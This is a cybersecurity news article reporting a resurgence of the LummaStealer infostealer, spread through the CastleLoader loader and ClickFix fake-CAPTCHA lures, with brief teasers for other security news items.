Data Security , Malware LummaStealer surges with CastleLoader and ClickFix techniques February 12, 2026 By SC Staff LummaStealer infections have seen a significant increase, primarily utilizing the ClickFix social engineering technique to deploy the CastleLoader malware. This resurgence follows a major disruption of the LummaStealer malware-as-a-service platform in May 2025, which saw over 2,300 domains seized. Despite law enforcement efforts, the operation resumed in July 2025 and has since scaled considerably, as covered by Bleeping Computer. The current LummaStealer campaigns are heavily reliant on CastleLoader, a modular malware loader that executes payloads in memory with extensive obfuscation. CastleLoader, which emerged in early 2025, has been used to distribute various infostealers and remote access trojans. It employs sophisticated techniques to evade detection, including environment checks and adaptive persistence mechanisms. The ClickFix method, a key infection vector, tricks users into executing malicious PowerShell commands by presenting fake CAPTCHA or verification pages. These commands download and run CastleLoader, which then delivers LummaStealer. The malware targets sensitive data such as credentials, cryptocurrency wallet details, and session cookies. The renewed activity of LummaStealer, amplified by CastleLoader and ClickFix, highlights the persistent threat of infostealer operations and the adaptability of cybercriminals. Organizations should prioritize educating employees about phishing and social engineering tactics and implement strong security protocols to mitigate the risk of credential theft and data breaches. Source: Bleeping Computer SC Staff Government security First statewide data classification standards introduced by Nevada SC Staff February 12, 2026 Nevada's Governor's Technology Office has introduced a new statewide data classification policy designed to standardize how agencies categorize and protect information, which is the first across the U.S., The Associated Press reports. Threat Intelligence Report: Data extortion intrusions spike SC Staff February 12, 2026 Cyberattacks involving data extortion reached 6,800 last year, which is nearly 63% higher than in 2024, fueled by the escalated activity of the Qilin, Sp1d3r Hunters, and Clop ransomware operations, reports Cybersecurity Dive. Breach Toll of Georgia health firm hack exceeds 620K SC Staff February 12, 2026 Major Georgia-based healthcare firm ApolloMD, which has over 125 practices across the U.S., has reported the compromise of 626,540 patients' sensitive information following a cyberattack in May, which was later claimed by the Qilin ransomware operation, according to The Record, a news site by cybersecurity firm Recorded Future. Get daily email updates SC Media's daily must-read of the most current and pressing daily news Related Terms Byte Checksum Cryptographic Hash Functions Cyclic Redundancy Check (CRC) Data Aggregation Data Encryption Standard (DES) Data Loss Prevention (DLP) Data Warehousing Digital Envelope Digital Signature Algorithm (DSA) You can skip this ad in 5 seconds